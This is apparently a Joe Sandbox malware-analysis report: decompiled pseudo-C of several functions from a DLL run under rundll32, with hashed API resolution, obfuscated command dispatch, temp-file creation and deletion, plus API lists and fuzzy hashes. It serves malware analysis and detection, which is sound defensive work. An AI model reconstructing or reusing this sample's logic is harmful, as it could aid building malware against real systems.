                  				E0000000118000958C( *((intOrPtr*)(_t216 + 0x98)) + 0x18);
                  				 *((long long*)(_t209 + 0x40)) = _t254;
                  				 *((long long*)(_t209 + 0x48)) =  *((intOrPtr*)(_t216 + 0x90));
                  				 *((intOrPtr*)(_t209 + 0x50)) = bpl;
                  				if ( *((char*)(_t209 + 0x70)) == 0) goto 0x80008f09;
                  				 *((char*)(_t209 + 0x70)) = 0;
                  				asm("lock and dword [esi+0x2c], 0xfffffffe");
                  				LeaveCriticalSection(??);
                  				if ( *((intOrPtr*)(_t209 + 0x40)) == 0) goto 0x80008f3e;
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80008f6a;
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				if (0x57 != 0) goto 0x800090f3;
                  				if (E00000001180002370(r13d ^ 0x881e33f6, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x800090ee;
                  				_t77 = E000000011800038F8( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)), _t216 + 0x98);
                  				_t91 =  *((intOrPtr*)(_t216 + 0x98));
                  				if (_t77 != 0) goto 0x80008fd2;
                  				if (_t91 == 0) goto 0x800090ee;
                  				 *((intOrPtr*)(_t209 + 0x28)) = _t91;
                  				if (E00000001180002370(r13d ^ 0xa2dd2342, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x8000905e;
                  				_t39 = _t158 + 0x10; // 0x10
                  				_t88 = _t39;
                  				_t115 =  <  ?  *((void*)(_t216 + 0x90)) : _t88;
                  				E0000000118000958C( *_t209 + 0x18);
                  				r8d = _t115;
                  				memcpy(??, ??, ??);
                  				if (_t115 - _t88 >= 0) goto 0x80009043;
                  				r8d = _t88 - _t115;
                  				memset(??, ??, ??);
                  				LeaveCriticalSection(??);
                  				HeapFree(??, ??, ??);
                  				r13d = r13d ^ 0x1a1a0866;
                  				if (E00000001180002370(r13d, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x800090f3;
                  				if (E000000011800038F8( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)), _t216 + 0x98) == 0) goto 0x800090f3;
                  				if ( *((intOrPtr*)(_t216 + 0x98)) == 0) goto 0x800090f3;
                  				_t55 =  *_t209 + 0x18; // 0x28
                  				E0000000118000958C(_t55);
                  				GetSystemTimeAsFileTime(??);
                  				_t160 =  *((intOrPtr*)(_t216 + 0x30)) + ( *((intOrPtr*)( *0x8000d4a0 + 8)) +  *((intOrPtr*)( *0x8000d4a0 + 8))) * 0x23c34600;
                  				 *((long long*)(_t216 + 0x30)) = _t160;
                  				 *((long long*)(_t209 + 0x30)) = _t160;
                  				LeaveCriticalSection(??);
                  				goto 0x800090f3;
                  				goto 0x80008f6a;
                  				return 1;
                  			}





























                  0x180008d78
                  0x180008d7b
                  0x180008d7f
                  0x180008d8e
                  0x180008d99
                  0x180008daa
                  0x180008dbe
                  0x180008dca
                  0x180008ddc
                  0x180008de0
                  0x180008de3
                  0x180008deb
                  0x180008df3
                  0x180008e09
                  0x180008e0e
                  0x180008e14
                  0x180008e1a
                  0x180008e29
                  0x180008e35
                  0x180008e3f
                  0x180008e44
                  0x180008e46
                  0x180008e49
                  0x180008e4e
                  0x180008e53
                  0x180008e5c
                  0x180008e63
                  0x180008e63
                  0x180008e6b
                  0x180008e79
                  0x180008e7e
                  0x180008e85
                  0x180008e8a
                  0x180008e8c
                  0x180008e8f
                  0x180008e93
                  0x180008e97
                  0x180008e9e
                  0x180008ea0
                  0x180008ea3
                  0x180008ea9
                  0x180008eae
                  0x180008eb3
                  0x180008eb5
                  0x180008eba
                  0x180008ec3
                  0x180008eca
                  0x180008ed8
                  0x180008ee6
                  0x180008ef3
                  0x180008ef7
                  0x180008efb
                  0x180008f03
                  0x180008f05
                  0x180008f09
                  0x180008f12
                  0x180008f1b
                  0x180008f2a
                  0x180008f38
                  0x180008f4d
                  0x180008f57
                  0x180008f77
                  0x180008f7f
                  0x180008fa5
                  0x180008fba
                  0x180008fbf
                  0x180008fc8
                  0x180008fcc
                  0x180008fd5
                  0x180008ff5
                  0x180008ffa
                  0x180008ffa
                  0x18000900b
                  0x180009013
                  0x180009021
                  0x180009026
                  0x18000902d
                  0x18000903b
                  0x18000903e
                  0x180009048
                  0x180009058
                  0x18000905e
                  0x180009081
                  0x180009099
                  0x1800090a4
                  0x1800090a9
                  0x1800090ad
                  0x1800090b7
                  0x1800090cc
                  0x1800090d3
                  0x1800090d8
                  0x1800090dc
                  0x1800090e2
                  0x1800090e9
                  0x18000910c

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$CriticalLeaveSection$AllocTimelstrlenmemcpy$FileSystemmemset
                  • String ID:
                  • API String ID: 3273538229-0
                  • Opcode ID: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
                  • Instruction ID: 6b8e83564c84abddb59c8c95e9bb71b7576c070b9c7c9cfbfdeb8062ede7394d
                  • Opcode Fuzzy Hash: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
                  • Instruction Fuzzy Hash: 65A18032204A8986EBA6DF66E4543DA7791FB8DBC4F48C015EA8D47755DF38C64EC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 520 180001844-180001874 521 18000187a-18000187d 520->521 522 180001a6f-180001a85 520->522 521->522 523 180001883-180001893 call 180007b04 521->523 526 180001899-1800018b3 GetTempPathW 523->526 527 180001a6a 523->527 528 180001a55 526->528 529 1800018b9-1800018cf HeapAlloc 526->529 527->522 530 180001a5a-180001a68 HeapFree 528->530 529->528 531 1800018d5-1800018e3 GetTempPathW 529->531 530->522 532 1800018e5-180001914 GetSystemTimeAsFileTime GetCurrentThreadId GetTempFileNameW 531->532 533 180001916-180001924 HeapFree 531->533 532->533 534 180001927-18000192a 532->534 533->534 534->528 535 180001930-180001935 534->535 536 180001938-18000194f StrChrW 535->536 537 180001951-180001962 536->537 538 180001964-180001972 lstrlenW 536->538 539 180001976-180001979 537->539 538->539 540 1800019a7-1800019ab 539->540 541 18000197b-180001986 539->541 542 1800019b9-1800019c4 540->542 543 1800019ad-1800019b7 540->543 544 180001988-18000198c 541->544 545 18000198e-180001997 541->545 547 1800019c6-1800019e0 call 180009b7c 542->547 548 1800019ef-1800019f2 542->548 546 180001999-18000199c 543->546 544->545 544->546 545->541 545->546 546->540 549 18000199e-1800019a5 546->549 552 180001a3c-180001a53 DeleteFileW HeapFree 547->552 555 1800019e2-1800019e8 547->555 551 1800019f4-180001a0d call 180003698 548->551 548->552 549->540 549->543 551->552 558 180001a0f-180001a36 call 180005bdc HeapFree 551->558 552->530 555->551 557 1800019ea 555->557 557->536 558->552
                  C-Code - Quality: 15%
                  			E00000001180001844(long long __rbx, void* __rcx, intOrPtr* __rdx, long long _a8, int _a16, char _a24, signed int _a32) {
                  				signed long long _v72;
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				long _t27;
                  				int _t34;
                  				void* _t36;
                  				int _t53;
                  				int _t61;
                  				intOrPtr _t68;
                  				intOrPtr _t69;
                  				intOrPtr* _t92;
                  				signed long long _t93;
                  				intOrPtr* _t106;
                  				void* _t118;
                  				void* _t121;
                  				intOrPtr* _t122;
                  				intOrPtr* _t123;
                  				void* _t125;
                  				signed long long _t132;
                  				void* _t140;
                  				void* _t145;
                  
                  				_t94 = __rbx;
                  				_a8 = __rbx;
                  				_t92 =  *0x8000d4a0;
                  				r12d = 0;
                  				_t145 = __rcx;
                  				if (__rdx == _t140) goto 0x80001a6f;
                  				if ( *__rdx == r12b) goto 0x80001a6f;
                  				E00000001180007B04(__rbx, __rdx, _t118, _t121, _t125, __rdx);
                  				if (_t92 == _t140) goto 0x80001a6a;
                  				_t93 =  *0x8000d4a0;
                  				_t27 = GetTempPathW(??, ??);
                  				if (_t27 == r12d) goto 0x80001a55;
                  				HeapAlloc(??, ??, ??);
                  				if (_t93 == _t140) goto 0x80001a55;
                  				if (GetTempPathW(??, ??) == r12d) goto 0x80001916;
                  				GetSystemTimeAsFileTime(??);
                  				r8d = GetCurrentThreadId() ^ _a32;
                  				if (GetTempFileNameW(??, ??, ??, ??) != r12d) goto 0x80001927;
                  				_t132 = _t93;
                  				HeapFree(??, ??, ??);
                  				if (_t140 == _t140) goto 0x80001a55;
                  				_t122 = _t92;
                  				__imp__StrChrW();
                  				r8d = 0;
                  				if (_t93 == _t132) goto 0x80001964;
                  				_a16 = _t27;
                  				goto 0x80001976;
                  				_t106 = _t122;
                  				_t34 = lstrlenW(??);
                  				r8d = 0;
                  				_a16 = _t34;
                  				if (_t34 == r8d) goto 0x800019a7;
                  				_t11 = _t106 - 1; // -1
                  				_t61 = _t11;
                  				_t68 =  *((intOrPtr*)(_t122 + _t93 * 2));
                  				if (_t68 == 0x20) goto 0x8000198e;
                  				if (_t68 != 9) goto 0x80001999;
                  				_t53 = _t61;
                  				_a16 = _t61;
                  				if (_t61 != r8d) goto 0x8000197b;
                  				if (_t53 == r8d) goto 0x800019a7;
                  				_t69 =  *_t122;
                  				if (_t69 == 0x20) goto 0x800019ad;
                  				if (_t69 != 9) goto 0x800019b9;
                  				_t123 = _t122 + 2;
                  				_a16 = _t53 - 1;
                  				goto 0x80001999;
                  				 *((intOrPtr*)(_t123 + _t93 * 2)) = r8w;
                  				if ( *_t123 == r8w) goto 0x800019ef;
                  				_v72 = _t132;
                  				r9d = 0;
                  				_t36 = E00000001180009B7C(_t94, _t145, _t123, _t140, _t123,  *((intOrPtr*)(_t93 + 8)), _t140);
                  				if (_t36 != 0) goto 0x80001a3c;
                  				if (_t93 + 2 == 0) goto 0x800019f4;
                  				goto 0x80001938;
                  				if (_t36 != r8d) goto 0x80001a3c;
                  				if (E00000001180003698(_t36 - r8d, _t94, _t140,  &_a24,  *((intOrPtr*)(_t93 + 8)),  &_a16, _t93) != 0) goto 0x80001a3c;
                  				r9d = _a16;
                  				E00000001180005BDC(_t94, _t145, _t93 + 2,  *((intOrPtr*)(_t93 + 8)), _a24);
                  				HeapFree(??, ??, ??);
                  				DeleteFileW(??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80001a5a;
                  				HeapFree(??, ??, ??);
                  				goto 0x80001a6f;
                  				return 8;
                  			}

























                  0x180001844
                  0x180001844
                  0x180001858
                  0x18000185f
                  0x180001869
                  0x180001874
                  0x18000187d
                  0x180001888
                  0x180001893
                  0x180001899
                  0x1800018a8
                  0x1800018b3
                  0x1800018c3
                  0x1800018cf
                  0x1800018e3
                  0x1800018ed
                  0x180001908
                  0x180001914
                  0x180001916
                  0x18000191e
                  0x18000192a
                  0x180001935
                  0x180001940
                  0x180001946
                  0x18000194f
                  0x18000195e
                  0x180001962
                  0x180001964
                  0x180001967
                  0x18000196d
                  0x180001972
                  0x180001979
                  0x18000197b
                  0x18000197b
                  0x18000197e
                  0x180001986
                  0x18000198c
                  0x18000198e
                  0x180001990
                  0x180001997
                  0x18000199c
                  0x18000199e
                  0x1800019a5
                  0x1800019ab
                  0x1800019ad
                  0x1800019b3
                  0x1800019b7
                  0x1800019bb
                  0x1800019c4
                  0x1800019c6
                  0x1800019cb
                  0x1800019d7
                  0x1800019e0
                  0x1800019e8
                  0x1800019ea
                  0x1800019f2
                  0x180001a0d
                  0x180001a0f
                  0x180001a22
                  0x180001a36
                  0x180001a3f
                  0x180001a4d
                  0x180001a53
                  0x180001a62
                  0x180001a68
                  0x180001a85

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$FileTemp$AllocPathTimelstrlen$CurrentDeleteNameSystemThreadmemset
                  • String ID:
                  • API String ID: 2968359827-0
                  • Opcode ID: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
                  • Instruction ID: f42bf4f4e696ed8dde712627642a23392779c5e7d82fb71db4855592268e1331
                  • Opcode Fuzzy Hash: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
                  • Instruction Fuzzy Hash: 1C51C931704548CAF7E6DB26A8543EA7691B78DBC1F54C015FE4687BA4EE3C8A4DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 53%
                  			E00000001180005748(void* __ecx, signed int __edx, signed long long __rbx, void* __rcx, void* __rdx, void* __r8) {
                  				void* __rdi;
                  				void* __rsi;
                  				signed int _t35;
                  				void* _t69;
                  				void* _t80;
                  				char* _t113;
                  				signed long long _t116;
                  				char* _t124;
                  				void* _t142;
                  				void* _t145;
                  				char* _t147;
                  				signed long long _t150;
                  				void* _t152;
                  				void* _t153;
                  				long _t169;
                  				void* _t170;
                  				void* _t172;
                  				void* _t175;
                  
                  				_t116 = __rbx;
                  				 *((long long*)(_t152 + 8)) = __rbx;
                  				 *(_t152 + 0x18) = _t150;
                  				_t153 = _t152 - 0x40;
                  				_t113 =  *0x8000d4a0;
                  				r15d =  *0x8000d498;
                  				_t35 = r15d ^ __edx;
                  				_t146 = __r8;
                  				_t170 = __rcx;
                  				_t4 = _t150 + 1; // 0x1
                  				_t80 = _t4;
                  				if (_t35 == 0x139d2b8d) goto 0x8000588d;
                  				if (_t35 == 0x15f5a8c2) goto 0x80005865;
                  				if (_t35 == 0x2f77acf9) goto 0x8000588b;
                  				if (_t35 == 0x31f2972e) goto 0x80005861;
                  				if (_t35 == 0x48e12436) goto 0x80005965;
                  				if (_t35 == 0x4d382929) goto 0x80005905;
                  				if (_t35 == 0x7f513d6b) goto 0x80005863;
                  				if (_t35 == 0xb016dc39) goto 0x80005852;
                  				if (_t35 == 0xb057dfc9) goto 0x800057e4;
                  				goto 0x800059bb;
                  				if (r9d == 0) goto 0x80005848;
                  				E000000011800024CC(r9d, __rbx, __r8, __r8, _t175);
                  				if (_t113 == 0) goto 0x8000583e;
                  				 *(_t153 + 0x20) =  *(_t153 + 0x20) & _t116;
                  				if (E00000001180002668(_t113, _t116, _t170, 0x180001844, _t146, _t150, _t113,  *((intOrPtr*)(_t153 + 0x90))) != 0) goto 0x8000582b;
                  				goto 0x800059bb;
                  				HeapFree(_t172, _t169, _t142);
                  				goto 0x800059bb;
                  				goto 0x800059bb;
                  				goto 0x800059bb;
                  				SetEvent(_t145);
                  				goto 0x800059bb;
                  				if (r9d == 0) goto 0x80005848;
                  				_t124 = _t113;
                  				E000000011800024CC(r9d, _t116, _t124, _t146);
                  				_t147 = _t113;
                  				if (_t113 == 0) goto 0x8000583e;
                  				if (_t80 + _t80 != 2) goto 0x800058ae;
                  				goto 0x800058c2;
                  				if ( *((intOrPtr*)(_t124 + 0x50)) == 0) goto 0x800058ec;
                  				WaitForSingleObject(??, ??);
                  				asm("sbb ebx, ebx");
                  				goto 0x800058f1;
                  				_t139 =  ==  ? 0x18000543c : 0x180001b7c;
                  				 *(_t153 + 0x20) =  *(_t153 + 0x20) & _t150;
                  				if (E00000001180002668(0x18000543c, _t116, _t170,  ==  ? 0x18000543c : 0x180001b7c, _t147, _t150, _t147,  *((intOrPtr*)(_t153 + 0x90))) == 0) goto 0x80005821;
                  				goto 0x8000582e;
                  				if (_t80 == 0) goto 0x800059bb;
                  				if (0x426 != 0x426) goto 0x800059bb;
                  				if (_t147 == 0) goto 0x8000595f;
                  				if ( *_t147 == 0) goto 0x8000595f;
                  				memset(??, ??, ??);
                  				if (E000000011800020DC(0x18000543c, _t116, _t147, _t153 + 0x30, _t147) != 0) goto 0x8000595d;
                  				if (E000000011800038F8(_t147, _t153 + 0x30, _t153 + 0x78) == 0) goto 0x8000595f;
                  				asm("ror ax, 0x8");
                  				 *((short*)(_t153 + 0x32)) =  *(_t153 + 0x78) & 0x0000ffff;
                  				if (0 != 0) goto 0x800059bb;
                  				if ( *(_t170 + 0x50) == 0) goto 0x8000599a;
                  				 *(_t170 + 0x50) =  *(_t170 + 0x50) & 0x00000000;
                  				E00000001180007950(0,  *((intOrPtr*)( *0x8000d4a0 + 8)),  *(_t170 + 0x50), _t113,  *(_t170 + 0x50), _t150);
                  				HeapFree(??, ??, ??);
                  				goto 0x8000599f;
                  				if (_t80 == 0) goto 0x800059bb;
                  				_t69 = E00000001180001A88( *((intOrPtr*)( *0x8000d4a0 + 8)), _t153 + 0x30, _t113,  *(_t170 + 0x50), _t150,  *((intOrPtr*)(_t170 + 0x38)), _t170 + 0x50);
                  				if ( *((long long*)(_t153 + 0x90)) == 0) goto 0x800059e1;
                  				if (_t69 == 0x3e5) goto 0x800059e1;
                  				r8d = _t69;
                  				E00000001180005600( *((intOrPtr*)( *0x8000d4a0 + 8)), _t170,  *((intOrPtr*)(_t153 + 0x90)), _t150);
                  				return _t69;
                  			}





















                  0x180005748
                  0x180005748
                  0x18000574d
                  0x18000575a
                  0x18000575e
                  0x180005765
                  0x180005777
                  0x180005779
                  0x18000577c
                  0x18000577f
                  0x18000577f
                  0x180005787
                  0x180005792
                  0x18000579d
                  0x1800057a8
                  0x1800057b3
                  0x1800057be
                  0x1800057c9
                  0x1800057d4
                  0x1800057db
                  0x1800057df
                  0x1800057e7
                  0x1800057ef
                  0x1800057fa
                  0x180005804
                  0x18000581f
                  0x180005826
                  0x180005833
                  0x180005839
                  0x180005843
                  0x18000584d
                  0x180005856
                  0x18000585c
                  0x180005868
                  0x18000586d
                  0x180005870
                  0x180005875
                  0x18000587b
                  0x180005880
                  0x180005889
                  0x180005894
                  0x18000589c
                  0x1800058a4
                  0x1800058ac
                  0x1800058be
                  0x1800058ca
                  0x1800058de
                  0x1800058e7
                  0x1800058f3
                  0x1800058ff
                  0x18000590d
                  0x180005912
                  0x180005926
                  0x18000593a
                  0x18000594d
                  0x180005954
                  0x180005958
                  0x180005963
                  0x18000596d
                  0x180005976
                  0x180005983
                  0x180005990
                  0x180005998
                  0x1800059a1
                  0x1800059b9
                  0x1800059c4
                  0x1800059cc
                  0x1800059d6
                  0x1800059dc
                  0x1800059fb

                  APIs
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005833
                  • SetEvent.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005856
                  • WaitForSingleObject.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000589C
                  • memset.NTDLL(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005926
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005990
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: FreeHeap$EventObjectSingleWaitmemset
                  • String ID: ))8M$6$H$lJu
                  • API String ID: 2222956709-2816507560
                  • Opcode ID: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
                  • Instruction ID: 785fb66ca69b8b0f02f3e946b07437a251f863b49ae3d9a65a40210c3f307c76
                  • Opcode Fuzzy Hash: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
                  • Instruction Fuzzy Hash: 9A61B231205B4D86FBE7DA56A4843EB3291A74DBD2F54C026FE895B7D5DE28CA4EC300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 24%
                  			E00000001180004A14(void* __ebx, void* __ecx, long long* __rax, long long __rbx, void* __rdx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24, long long* _a40, void* _a48, intOrPtr _a56) {
                  				void* _v40;
                  				char _v80;
                  				intOrPtr _v88;
                  				char _v96;
                  				char _v104;
                  				intOrPtr _v120;
                  				long long _v128;
                  				long long _v136;
                  				char _t57;
                  				intOrPtr _t95;
                  				void* _t96;
                  				long long* _t114;
                  				long long* _t115;
                  
                  				_t114 = __rax;
                  				_a8 = __rbx;
                  				_a16 = __rbp;
                  				_a24 = __rsi;
                  				_t141 =  *0x8000d4a0;
                  				r14d = __ecx;
                  				_t95 = r8d;
                  				E0000000118000459C(0x4e1c2e77, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t114 == 0) goto 0x80004a75;
                  				r9d = 0x18;
                  				r8d = 0;
                  				_v136 = 0xf0000040;
                  				 *_t114();
                  				goto 0x80004a77;
                  				if (0 == 0) goto 0x80004c20;
                  				r8d = _a56;
                  				_t10 =  &_v96; // -190
                  				if (E00000001180006D04(__rbx, _v88, __rsi, _t10) != 0) goto 0x80004c02;
                  				_t11 = _t114 + 0x10; // 0x10
                  				r15d = _t11;
                  				memset(??, ??, ??);
                  				E0000000118000459C(0xd74cfe41, _t114,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t114 == 0) goto 0x80004ae3;
                  				r9d = 0;
                  				 *_t114();
                  				goto 0x80004ae5;
                  				if (0 != 0) goto 0x80004af9;
                  				if (GetLastError() != 0) goto 0x80004c02;
                  				_t57 =  >  ? r15d : _t95;
                  				r8d = _t57;
                  				_v104 = _t57;
                  				memcpy(??, ??, ??);
                  				_t96 = _t95 - _v104;
                  				if (r14d == 0) goto 0x80004b70;
                  				E0000000118000459C(0x4217c141, _t114,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t114 == 0) goto 0x80004baa;
                  				r8d = 0;
                  				_t23 =  &_v104; // -198
                  				_v120 = 0x20;
                  				_v128 = _t23;
                  				_t26 =  &_v80; // -174
                  				r8b = _t96 == 0;
                  				_v136 = _t26;
                  				r9d = 0;
                  				 *_t114();
                  				goto 0x80004bac;
                  				E0000000118000459C(0x8ea73a36, _t114, _v96);
                  				if (_t114 == 0) goto 0x80004baa;
                  				r8d = 0;
                  				_t29 =  &_v104; // -198
                  				_v128 = _t29;
                  				r8b = _t96 == 0;
                  				_t31 =  &_v80; // -174
                  				_v136 = _t31;
                  				r9d = 0;
                  				 *_t114();
                  				goto 0x80004bac;
                  				if (0 == 0) goto 0x80004bd6;
                  				r8d = _v104;
                  				memcpy(??, ??, ??);
                  				if (_t96 == 0) goto 0x80004bde;
                  				goto 0x80004afd;
                  				GetLastError();
                  				_t115 = _a40;
                  				 *_t115 = 0 + _v104;
                  				E0000000118000459C(0xff709000, _t115,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t115 == 0) goto 0x80004c02;
                  				 *_t115();
                  				E0000000118000459C(0xbaca8f4d, _t115,  *((intOrPtr*)(_t141 + 0x20)));
                  				if (_t115 == 0) goto 0x80004c28;
                  				 *_t115();
                  				goto 0x80004c28;
                  				return GetLastError();
                  			}
















                  0x180004a14
                  0x180004a14
                  0x180004a19
                  0x180004a1e
                  0x180004a33
                  0x180004a3a
                  0x180004a4c
                  0x180004a4f
                  0x180004a57
                  0x180004a5e
                  0x180004a64
                  0x180004a69
                  0x180004a71
                  0x180004a73
                  0x180004a79
                  0x180004a7f
                  0x180004a94
                  0x180004aa2
                  0x180004aa8
                  0x180004aa8
                  0x180004ab7
                  0x180004ac5
                  0x180004acd
                  0x180004adc
                  0x180004adf
                  0x180004ae1
                  0x180004ae7
                  0x180004af3
                  0x180004b07
                  0x180004b0e
                  0x180004b11
                  0x180004b15
                  0x180004b1e
                  0x180004b2c
                  0x180004b33
                  0x180004b3b
                  0x180004b3d
                  0x180004b40
                  0x180004b45
                  0x180004b4d
                  0x180004b52
                  0x180004b59
                  0x180004b5d
                  0x180004b67
                  0x180004b6c
                  0x180004b6e
                  0x180004b75
                  0x180004b7d
                  0x180004b7f
                  0x180004b82
                  0x180004b89
                  0x180004b8e
                  0x180004b92
                  0x180004b97
                  0x180004ba1
                  0x180004ba6
                  0x180004ba8
                  0x180004bae
                  0x180004bb0
                  0x180004bbd
                  0x180004bcf
                  0x180004bd1
                  0x180004bd6
                  0x180004bde
                  0x180004beb
                  0x180004bf1
                  0x180004bf9
                  0x180004c00
                  0x180004c0b
                  0x180004c13
                  0x180004c1c
                  0x180004c1e
                  0x180004c4a

                  APIs
                    • Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8
                  • memset.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AB7
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AE9
                  • memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004B15
                  • memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BBD
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BD6
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004C20
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorLast$memcpy$memset
                  • String ID: $@
                  • API String ID: 1408984137-1077428164
                  • Opcode ID: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
                  • Instruction ID: 6549d2ab533297c31cadfe8b85b87dceba819ad31def954566d9370a515f3166
                  • Opcode Fuzzy Hash: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
                  • Instruction Fuzzy Hash: A851607330574982EBA2DBA5A45079AB7A0FBCC7D0F548411BE8D87B49DF78CA08CB04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 28%
                  			E00000001180003A24(long long __rbx, long long* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
                  				void* __rdi;
                  				long _t49;
                  				void* _t54;
                  				void* _t72;
                  				signed long long _t94;
                  				signed long long _t95;
                  				long long* _t97;
                  				int _t112;
                  				void* _t113;
                  				signed long long _t118;
                  				void* _t120;
                  				long long* _t126;
                  				void* _t128;
                  				signed long long _t129;
                  				void* _t131;
                  
                  				 *((long long*)(_t120 + 8)) = __rbx;
                  				 *(_t120 + 0x10) = _t118;
                  				 *((long long*)(_t120 + 0x18)) = __rsi;
                  				_t116 =  *0x8000d4a0;
                  				_t113 = __r9;
                  				_t97 = __rcx;
                  				if (__r9 != 0) goto 0x80003a5b;
                  				goto 0x80003be2;
                  				r8d = 0x10;
                  				memcpy(_t131, _t128, _t112);
                  				InitializeCriticalSection(??);
                  				_t6 = _t97 + 0x88; // 0x88
                  				_t126 = _t6;
                  				 *((long long*)(__rcx + 0xa0)) = 0x180002f24;
                  				_t129 = _t128 | 0xffffffff;
                  				 *((long long*)(__rcx + 0xa8)) = E00000001180007A7C;
                  				r13d = _t129 + 2;
                  				r9d = 0;
                  				r8d = 0;
                  				 *((long long*)(__rcx + 0x98)) = E00000001180008368;
                  				 *((long long*)(__rcx + 0x90)) = _t126;
                  				 *_t126 = _t126;
                  				 *(__rcx + 0x10) = _t129;
                  				CreateEventA(??, ??, ??, ??);
                  				 *((long long*)(__rcx + 0x20)) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				r9d = 0;
                  				r8d = 0;
                  				CreateEventA(??, ??, ??, ??);
                  				 *((long long*)(__rcx + 0x30)) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				 *(__rcx + 0x38) =  *(__rcx + 0x38) & _t118;
                  				r8d = 0;
                  				CreateMutexA(??, ??, ??);
                  				 *((long long*)(__rcx + 0x28)) = E00000001180008368;
                  				 *(__rcx + 0x38) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				E00000001180001C00(0, __rcx, __r9, __r9,  *0x8000d4a0, _t118);
                  				 *_t97 = E00000001180008368;
